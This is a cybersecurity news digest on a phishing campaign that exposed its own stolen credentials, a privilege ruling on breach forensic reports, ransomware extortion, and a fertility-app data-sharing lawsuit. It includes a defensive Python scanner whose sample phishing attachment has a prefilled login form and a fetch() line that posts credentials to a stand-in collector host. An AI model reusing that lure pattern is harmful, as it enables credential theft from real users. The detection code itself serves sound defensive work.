At a glance.
- Criminals have accidental data exposures, too.
- Forensic reports and attorney-client privilege.
- Extortion continues to pay.
- Fertility app sued for sharing data with third parties in China.
Phishing scammers accidentally expose harvested data.
Security Week reports that cybercriminals inadvertently exposed their bounty on the web after a phishing scam. Researchers at security vendor Check Point explain how, starting in August of last year, threat actors executed a phishing campaign that compromised the data of over one thousand corporate employees. The phishing emails were disguised as Xerox scan notifications containing a malicious HTML attachment. When the victim attempted to open the document, JavaScript code was triggered to perform passcode checks and send the data to the attackers’ server. By eluding Microsoft Office 365 Advanced Threat Protection (ATP) filters, the campaign allowed the cybercriminals to harvest credential data from thousands of organizations. What the attackers apparently didn’t realize was that the server storing the stolen data was accessible to the public with just a simple Google search. The researchers notified Google of the issue and have advised victims to use Google search capabilities to determine if their credentials were exposed.
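The lure described above (an HTML attachment carrying a login form and script that sends credentials to an outside host) is the kind of thing a mail gateway can triage before a user ever opens it. The following is an added illustration, not code from Check Point or the article: a small Python scanner that walks an HTML attachment and reports the indicators a defender would look for; the sample attachment, the `.invalid` hostnames and the `triage_html_attachment` function are all constructed for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the lure: a scan-notification page whose login
# form is prefilled with the recipient's address and whose script posts elsewhere.
SAMPLE_ATTACHMENT = """<html><body><h2>Xerox scan notification: invoice.pdf</h2>
<form id="f" action="https://collector.invalid/post.php" method="post">
<input type="text" name="user" value="alice@victim.invalid">
<input type="password" name="pass"><input type="submit" value="Open document">
</form><script>
document.getElementById('f').onsubmit = function () {
  fetch('https://collector.invalid/post.php', {method: 'POST'});  // credential send-off
};</script></body></html>"""

class _Scanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.has_script = self.has_password = self.in_script = False
        self.prefilled, self.hosts = [], set()
    def _add_host(self, url):
        host = urlparse(url).hostname
        if host:
            self.hosts.add(host.lower())
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self.has_script = self.in_script = True
        elif tag == "input":
            if a.get("type", "").lower() == "password":
                self.has_password = True
            if "@" in a.get("value", ""):          # identity already filled in for the victim
                self.prefilled.append(a["value"])
        elif tag == "form" and a.get("action"):
            self._add_host(a["action"])
    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
    def handle_data(self, data):
        if self.in_script:                        # URLs hard-coded inside the script
            for url in re.findall(r"https?://[^\s'\"()]+", data):
                self._add_host(url)

def triage_html_attachment(html, sender_domain):
    """Return the sorted indicator names found; several together warrant quarantine."""
    s = _Scanner()
    s.feed(html)
    external = any(not h.endswith(sender_domain.lower()) for h in s.hosts)
    found = {"password_field": s.has_password, "inline_script": s.has_script,
             "prefilled_identity": bool(s.prefilled), "external_post_host": external}
    return sorted(k for k, v in found.items() if v)
```

A genuine scan notification from a multifunction printer carries no password field and no script, so the empty result on such a message is the expected baseline.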
We received some comments on the incident from Saryu Nayyar, CEO of Gurucul, who notes that the criminals, for all their slovenly opsec, still went undetected for several months:
“The report of malicious actors having their stolen user IDs and passwords revealed by a simple Google search is Karma in action. It shows that attackers are susceptible to the same sort of simple configuration errors that many of them leverage against their targets. But this case also shows that attackers can operate phishing schemes successfully for many months before they're exposed.
“Sadly, users often remain the weakest link in the security chain. While user education can help, organizations still need to maintain strong perimeter and interior defenses, including multi-factor authentication and security analytics, to resist intrusions when credentials are stolen through clever phishing or social engineering attacks.”
Chloé Messdaghi, Chief Strategist at Point3 Security, also commented. She thinks the criminals' selection of victims is interesting, and notes the growing plausibility of their phishbait:
“It’s interesting that they are targeting construction – that’s an industry that hasn’t received as much attention from attackers as other sectors. Usually, attackers are focused on healthcare, finance, energy, and retail – but those industries have certainly increased their investments in cybersecurity training over the last two years, so these attackers cleverly shifted to construction, where every initiative involves tens of millions or often hundreds of millions of dollars, and deadlines and regulatory requirements must be strictly adhered to.
“The attack approach was also clever: a fake login that already self-populates, so that most people wouldn’t be suspicious of the possibility of a phishing attack. Usually, when something self-populates it’s viewed as legit and trusted. That’s why this campaign went undetected so often. They were clever but not clever enough, since they forgot to close their own server down and as a result, blew their chance to monetize their loot.
“We need to understand that these phishing attacks are getting more and more realistic, and the public needs to know that if they don’t consider their sector a target, it’s a very safe bet that it actually is.”
Are data breach forensic reports exceptions to privilege?
JD Supra reports that in the case of Wengui v. Clark Hill, a US District Court determined that work-product and attorney-client privileges were not sufficient to prevent the submission of cyberattack forensic reports. Law firm Clark Hill experienced a cyberattack in which the plaintiff, a former employee of the firm, was compromised. The plaintiff requested that all investigative reports of the attack be produced, but the law firm contested this, asserting that the forensic reports were protected by work-product and attorney-client privilege. The court ruled in favor of the plaintiff, reasoning that the reports were the result of an investigation of the cyberattack that would have been carried out even without the lawsuit and that they included recommendations for improving the firm’s cybersecurity practices. The ruling is not the first of its sort to side with the plaintiff, and the decision raises the question of whether data breach investigation reports can be used against the targeted company in court. Law360 offers advice on how organizations can protect these reports going forward; its suggestions include using a cybersecurity firm with no previous ties to the defendant, reserving the report for litigation purposes only, and avoiding the inclusion of suggestions for remediation.
Extortion tactics force ransomware targets to pay.
ZDNet reports that a recent trend in ransomware campaigns has victims paying up, even if they have their data backed up. As an added incentive to pay the ransom, in addition to encrypting the target’s data, threat actors are also stealing and threatening to publish sensitive data. The ransomware gang Maze was the first to use this tactic, but now seventeen other groups have started employing the strategy. Cybersecurity company Emsisoft remarked in their 'State of Ransomware' report, “Like legitimate businesses, criminal enterprises adopt strategies that are proven to work, and data theft has indeed been proven to work.”
Premom sued for sharing data with Chinese third parties.
A putative class action lawsuit has been leveled at fertility app Premom, which is accused of sharing user data with Chinese data collectors, reports Law360. The plaintiff asserts she and fellow users were deceived by the app’s privacy terms and that the data were shared without user consent. This is not the first time Premom’s policies have been called into question. Last August the International Digital Accountability Council discovered that the app was selling hardware identifiers and geographic data to third parties, and a Federal Trade Commission probe is under consideration as a result.